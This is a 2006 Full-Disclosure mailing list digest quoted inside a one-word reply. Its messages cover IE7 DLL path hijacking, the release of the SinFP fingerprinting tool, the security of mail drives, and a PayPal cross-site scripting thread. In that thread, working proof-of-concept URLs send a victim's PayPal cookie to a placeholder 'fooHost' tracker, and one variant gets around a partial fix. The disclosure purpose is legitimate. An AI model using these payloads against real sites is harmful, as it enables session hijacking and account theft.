help On 11/6/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > Send Full-Disclosure mailing list submissions to > full-disclosure@lists.grok.org.uk > > To subscribe or unsubscribe via the World Wide Web, visit > https://lists.grok.org.uk/mailman/listinfo/full-disclosure > or, via email, send a message with subject or body 'help' to > [EMAIL PROTECTED] > > You can reach the person managing the list at > [EMAIL PROTECTED] > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of Full-Disclosure digest..." > > > Note to digest recipients - when replying to digest posts, please trim your > post appropriately. Thank you. > > > Today's Topics: > > 1. Re: Internet Explorer 7 - Still Spyware Writers' Heaven > (Joshua Gimer) > 2. SinFP 2.04 release, works under Windows (GomoR) > 3. Re: Mail Drives Security Considerations (gabriel rosenkoetter) > 4. Re: alert() (Matthew Flaschen) > 5. Re: Mail Drives Security Considerations (Darkz) > 6. Re: Internet Explorer 7 - Still Spyware Writers' Heaven > (Roger A. Grimes) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Sat, 4 Nov 2006 13:15:35 -0700 > From: "Joshua Gimer" <[EMAIL PROTECTED]> > Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware > Writers' Heaven > To: "Eliah Kagan" <[EMAIL PROTECTED]> > Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com > Message-ID: > <[EMAIL PROTECTED]> > Content-Type: text/plain; charset="iso-8859-1" > > If Microsoft is not planning on providing a fix for this until Vista, I can > see a worm coming from this. Forgive me if I don't know how this works in > the windows world, but when it is looking for this DLL, does it take the > first one that it finds within your path; like in UNIX? Or does it look in > all directories within your path and then decide? I am guessing the former, > but I am just clarifying. > > On 11/3/06, Eliah Kagan <[EMAIL PROTECTED]> wrote: > > > > On 11/2/06, Roger A. Grimes wrote: > > > So, if you're statement is accurate that malware would need to be placed > > > in a directory identified by the PATH statement, we can relax because > > > that would require Administrator access to pull off. Admin access would > > > be needed to modify the PATH statement appropriately to include the > > > user's desktop or some other new user writable location or Admin access > > > would be needed to copy a file into the locations indicated by the > > > default PATH statement. > > > > It would not require *administrator* access--non-administrator users > > can still add things to their own PATHs, just not to the universal, > > system PATH. (See Control Panel > System > Advanced > Environment > > Variables.) > > > > -Eliah > > > > > > -- > Thx > Joshua Gimer > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: > http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/b97c9d1d/attachment-0001.html > > ------------------------------ > > Message: 2 > Date: Sun, 5 Nov 2006 20:02:28 +0100 > From: GomoR <[EMAIL PROTECTED]> > Subject: [Full-disclosure] SinFP 2.04 release, works under Windows > To: full-disclosure@lists.grok.org.uk > Message-ID: <[EMAIL PROTECTED]> > Content-Type: text/plain; charset=us-ascii > > Hi, > > I'm pleased to announce the availability of SinFP 2.04, which now can > run under Windows ActivePerl. > > SinFP is a new approach to active and passive OS fingerprinting, you can > know more about its features here: > http://www.gomor.org/sinfp > > SinFP has now more than 130 signatures in its database. > > To be informed about new signature files, subscribe to: > http://lists.sourceforge.net/lists/listinfo/sinfp-discuss > > Installation instruction can be found here: > http://www.gomor.org/cgi-bin/index.pl?mode=view;page=sinfp#3 > > For Windows users, follow these instructions: > > This was tested with ActivePerl 5.8.8.819, with PPM v4.0. > > # If you are behind a proxy: > C:\> set http_proxy=http://username:[EMAIL PROTECTED]:port > > # Add gomor repository > C:\> ppm repo add gomor http://www.gomor.org/files/ppm/repo-8xx > > # Disable all other repo, if you have many. Or only ActiveState repo > # by default > C:\> ppm repo 1 off > ... > C:\> ppm install Net-SinFP > > # Re-enable all other repo > C:\> ppm repo 1 on > ... > > Launch it: > C:\> perl C:\perl\site\bin\sinfp.pl > > If you have error messages about failing to load some .dll, go to > www.microsoft.com. Then, in the search field, type in vcredist_x86.exe, > download it and install it. > > Please, do not hesitate to submit new signatures to sinfp_at_gomor.org, > or on the mailing list. > > Best regards, > > -- > ^ ___ ___ http://www.GomoR.org/ <-+ > | / __ |__/ Systems & Security Engineer | > | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- | > +--> Net::Packet <=> http://search.cpan.org/~gomor/ <--+ > > > > ------------------------------ > > Message: 3 > Date: Sun, 5 Nov 2006 18:18:10 -0500 > From: gabriel rosenkoetter <[EMAIL PROTECTED]> > Subject: Re: [Full-disclosure] Mail Drives Security Considerations > To: full-disclosure@lists.grok.org.uk > Message-ID: <[EMAIL PROTECTED]> > Content-Type: text/plain; charset="us-ascii" > > On Fri, Nov 03, 2006 at 11:28:27AM -0500, Matthew Flaschen wrote: > > Why can't message signing offer backwards compatibility (assuming you > > use multipart/signed)? > > Seems to me that adding a PGP signature verification to every > operation on files (even ls(1); you have to check to make sure it's > not a spoofed file) would rather noticeably impact the > performance of what's already got to be pretty slow on most users' > connections, and it adds a layer of complexity to the setup (you > have to generate the key pair, and have the private key available on > any system which you intend have write access) but that would certainly > work. Spam will still be a DoS against storage space, of course. > > Never mind that this software violates gmail's acceptable use > policy and is transmitted back and forth in the clear (unless you > want to roll PGP encryption into the mix, in which case keeping > paths in the clear in the subject breaks the security), so it'd be > hard to view data stored this way as being "secure" to begin with... > > -- > gabriel rosenkoetter > [EMAIL PROTECTED] > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: not available > Type: application/pgp-signature > Size: 189 bytes > Desc: not available > Url : > http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/669fedd5/attachment-0001.bin > > ------------------------------ > > Message: 4 > Date: Sun, 05 Nov 2006 22:24:25 -0500 > From: Matthew Flaschen <[EMAIL PROTECTED]> > Subject: Re: [Full-disclosure] alert() > To: Matthew Flaschen <[EMAIL PROTECTED]> > Cc: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED] > Message-ID: <[EMAIL PROTECTED]> > Content-Type: text/plain; charset="iso-8859-1" > > Hmm, I got an email from Paypal, saying > > "Thank you for bringing this incident of suspicious activity to our > attention. PayPal will investigate this activity immediately and contact > you further if any additional information is required.[...]" > > I'm fairly certain they're referring to this exploit, which I CCed them > on my previous post. > > Also, the POC I posted no longer works. It looks like Paypal is no > longer unescaping double quotation marks. Thus, the script fails to > append the cookie. At any rate, just changing the double quotes to > single quotes makes the POC work again: > > https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location='http://fooHost/tracker.php?'%2Bdocument.cookie > > Matt Flaschen > > Matthew Flaschen wrote: > > Good find. How about using it to steal the entire PayPal cookie, though: > > > https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie; > > > > > > [EMAIL PROTECTED] wrote: > >> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey- > >> outside&voice=javascript:document.write('heh');alert('bl00p'); > >> > >> > >> > >> Concerned about your privacy? Instantly send FREE secure email, no > account required > >> http://www.hushmail.com/send?l=480 > >> > >> Get the best prices on SSL certificates from Hushmail > >> https://www.hushssl.com?l=485 > >> > >> _______________________________________________ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > >> > > > > > > > > ------------------------------------------------------------------------ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: signature.asc > Type: application/pgp-signature > Size: 250 bytes > Desc: OpenPGP digital signature > Url : > http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/e53d7a03/attachment-0001.bin > > ------------------------------ > > Message: 5 > Date: Mon, 06 Nov 2006 10:36:10 +0200 > From: Darkz <[EMAIL PROTECTED]> > Subject: Re: [Full-disclosure] Mail Drives Security Considerations > To: Matthew Flaschen <[EMAIL PROTECTED]>, > full-disclosure@lists.grok.org.uk > Message-ID: <[EMAIL PROTECTED]> > Content-Type: text/plain; charset="us-ascii" > > An HTML attachment was scrubbed... > URL: > http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061106/76d0ca99/attachment-0001.html > > ------------------------------ > > Message: 6 > Date: Sun, 5 Nov 2006 22:35:25 -0500 > From: "Roger A. Grimes" <[EMAIL PROTECTED]> > Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware > Writers' Heaven > To: "Eliah Kagan" <[EMAIL PROTECTED]>, > <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com> > Message-ID: > <[EMAIL PROTECTED]> > > Content-Type: text/plain; charset="us-ascii" > > So all the malware writer has to do now is figure out how to do the > initial exploit in the first place, that would then allow them to muck > with path statements or place code in path executable areas. I mean, do > you get it, yet? If the malware writer figures out how do the initial > exploit, anything can be done, not just the path tricks. > > My WhereWindowsMalwareHides > document(http://weblog.infoworld.com/securityadviser/archives/2006/05/up > dated_where_w.html)contains over 145 different tricks and locations > where malware can hide and live, along with the path trick. Your point > is a valid point, but it's been a known issue for years. > > You can't skip over the hardest part, the initial exploit, and start > picking on one of over a hundred ways to muck with Windows users and > call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like > you're grasping at straws. At least tell us something new, and not > something that's been documented for years. > > Roger > > -----Original Message----- > From: Eliah Kagan [mailto:[EMAIL PROTECTED] > Sent: Friday, November 03, 2006 9:26 PM > To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com > Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven > > On 11/2/06, Roger A. Grimes wrote: > > So, if you're statement is accurate that malware would need to be > > placed in a directory identified by the PATH statement, we can relax > > because that would require Administrator access to pull off. Admin > > access would be needed to modify the PATH statement appropriately to > > include the user's desktop or some other new user writable location or > > > Admin access would be needed to copy a file into the locations > > indicated by the default PATH statement. > > It would not require *administrator* access--non-administrator users can > still add things to their own PATHs, just not to the universal, system > PATH. (See Control Panel > System > Advanced > Environment > Variables.) > > -Eliah > > > > ------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > End of Full-Disclosure Digest, Vol 21, Issue 9 > ********************************************** >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/